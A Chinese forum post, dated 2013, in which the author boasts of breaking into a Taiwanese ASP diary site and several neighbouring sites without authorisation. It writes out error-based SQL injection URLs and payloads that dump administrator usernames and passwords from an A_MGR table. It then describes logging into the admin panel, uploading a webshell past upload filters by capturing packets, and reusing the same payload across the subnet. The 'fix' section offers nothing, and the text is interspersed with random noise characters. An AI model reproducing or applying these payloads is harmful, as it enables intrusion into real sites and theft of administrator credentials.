发现一个注入点
1 f6 d) L; m; R1 _2 j. uhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
$ ~7 c! X8 B$ H# `2 B2 L X1 e4 z- C% W
习惯性的加’having1=1--* H. [1 g' b3 Y; I6 ^
' `9 x; C1 b" F$ k7 F+ G( R, ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—% V3 G$ B2 r& B
! S7 s7 d* @5 h( b- q0 Z4 U% b
0( [6 D8 q7 R1 v5 m# f. h- ]
6 v1 y& d* U* X. v
爆出Diary_A.dl_Title(这时候很激动啊)/ F, ?6 T7 D2 O- e; z
\$ I d. l, I; Q2 t* x那么继续4 M/ W/ l. s8 k# ^5 [8 R
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—9 c. e7 i* _0 X+ f6 E" s5 E9 P
. J. Y, N, U S) k$ |
继续,一直爆下去
- }+ C7 ~3 o& d! k7 ~" K
* O4 M- p& U- X% ^" l爆到几个字段和表段 但是没找到需要的管理用户的字段) b I& E+ u; ~( r0 C/ \
$ I5 \. O O: f- i蛋疼了 怎么办 然后去后台登陆页看源码
+ s' X; X) @7 b1 T. r5 z- D8 H
% ~6 F- S6 z5 | f7 D0
# {6 Z- O+ v2 f* L/ r% Q6 T* D5 z- s4 i/ M; c. d$ K* C
Input name= “ADUID”3 z; @) c" X6 o1 J2 e
Input name= “ADPWD”
/ ~8 m e% M+ [7 x" {% S& T
' o, T% t2 [$ l7 E1 L很幸运 找到了字段那就继续
# F9 W# S8 J- _6 Y7 J5 H找到之后开始爆用户/ E! i5 y( B8 l6 b
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
6 ^0 I; E( A" j( V$ R爆密码
6 A/ k, |* K% Y8 ~6 Mhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—( z- H w0 Y, G7 ~
测试了下 这个注入点只能爆到文章哪里的表
4 ? p" H9 Y7 C# q: q5 l1 ^
* \# b$ W* Y# a6 |, r2 d头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了: \9 H* X" f+ c; g
0 z& i7 `3 b8 b S( }) S
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了% X1 X9 l9 w" R- d
4 }0 G4 |& p" U2 o
4735 h J, L' Q6 h |5 s6 R% S7 H
9 o( m+ f0 H4 z7 M( `
进后台
3 r \; S+ g3 ^; g' i# _& j
9 Z b/ G& w) y; `* `0 w9 t& S1 v4 F6 g; U- t
发现几个上传点 有的地方不能上传 而且防止恶意代码
9 m8 P5 `3 v4 J' P
8 A$ ] P0 T2 E R* q( u没办法 各种百度各种找大牛 找到一只好像可以突破的马5 z: U2 y% b- f. m' W; n! x
5 y$ S8 M% M+ {7 b/ L, \
/ P$ [( M$ l0 ^" j& m2 `在系统管理那里直接上传 不过没有显示地址
d* g4 t: r0 Z0 v! r
3 b; [4 Z6 F7 c' q1 _再上传一次 抓包 搞定OK
. U9 W3 n; F/ B0 e
# V0 B0 b5 |& a$ X r. x! q6 Q) O& _8 U4 U" x/ f- b5 t+ L
. j! U8 R/ d3 w' L- N1 o: S
472
e2 u( p5 b2 E; @
& Q7 J0 Z/ M C/ s晚上不行了 去睡觉。。。% g1 y. N( F. j+ V. E3 l
第二天刚起床 闲的没事做继续日站吧 / e, r' i7 n. p1 X5 r: s
& X) G+ o* \2 r: f5 e$ j, u找个站 就把这个站的旁c扫了下
% f- R: P$ S. A5 A, J% Q5 @% l$ i+ i
发现c段也有一个购物站 ,然后还和这个站的模板差不多 F4 [8 L6 d/ m/ b) R; P7 k; Z4 b* H
+ R# c4 Z) v: m2 H) ~% c8 f
就找到会员登录口测试
0 H0 J/ z; X" J3 i0 |$ `& p. {. Z/ T9 J* `% i
'and (select top 1 MGR_UID from A_MGR)>0—, a A$ f3 _. j$ t
果断爆到了 这时候我很激动 通杀
: q3 A5 T* m2 h9 p6 r c8 @ O) m4 K$ y
再次翻c段+ C7 m- c0 A. M) ?& N" ?8 ]
' Z6 s9 R+ G- e. W# z
翻出几个站 都成功拿下
' J7 F f6 U* y% V2 c
* j* Y6 l! c8 [. p* R$ q
" @9 z9 s1 k) g6 t8 }9 }- p4 J! _& V
2 ~: D( b( W3 }; l* z& Z修复方案:& u0 m4 {. ]. M9 g- \
他们比我专业 / \2 ]$ M4 |7 l# s; n2 F0 C
* O: `8 E# u6 P9 _% a# I( u7 q
. h# \* _3 A$ ~% C7 n N! y" P
+ }8 O7 u2 [& B* ]6 J$ e! \ |
发表于 2013-4-4 17:40:38
收藏
支持
反对